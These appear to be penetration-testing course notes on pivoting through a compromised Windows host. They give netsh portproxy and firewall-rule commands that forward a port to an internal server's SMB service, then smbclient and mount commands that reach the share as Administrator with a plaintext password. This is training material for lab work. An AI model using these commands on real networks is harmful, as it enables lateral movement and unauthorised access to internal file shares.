Netsh for windows

Netsh for window

Window is compromised with privilege escalation. in addition to being connected to the current network (10.11.0.x), it has an additional network interface that seems to be connected to a different network (192.168.1.x). In this internal subnet, we identify a Windows Server 2016 machine (192.168.1.110) that has TCP port 445 open. (there are certain requirement which can be read in oscp material)

• we will use the netsh (interface) context to add an IPv4-to-IPv4 (v4tov4) proxy (portproxy) listening on 10.11.0.22 (listenaddress=10.11.0.22), port 4455 (listenport=4455) that will forward to the Windows 2016 Server (connectaddress=192.168.1.110) on port 445 (connectport=445): netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110

• Firewall will disallow inbound connections on TCP port 4455 which can be solved by adding rule netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow

• configure samba on linux Local port forwarding

• check tunnelling success, smbclient -L 10.11.0.22 --port=4455 --user=Administrator

• It will show a error, this error prohibits us from listing workgroups but it does not impact our ability to mount the share

sudo mkdir /mnt/win10_share
sudo mount -t cifs -o port=4455 //10.11.0.22/<sharename> -o username=Administrator,password=Qwerty09! /mnt/win10_share
ls -l /mnt/win10_share/